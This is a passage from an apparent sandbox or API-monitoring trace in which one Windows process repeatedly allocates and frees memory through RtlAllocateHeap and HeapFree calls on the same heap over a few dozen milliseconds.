hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0201.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 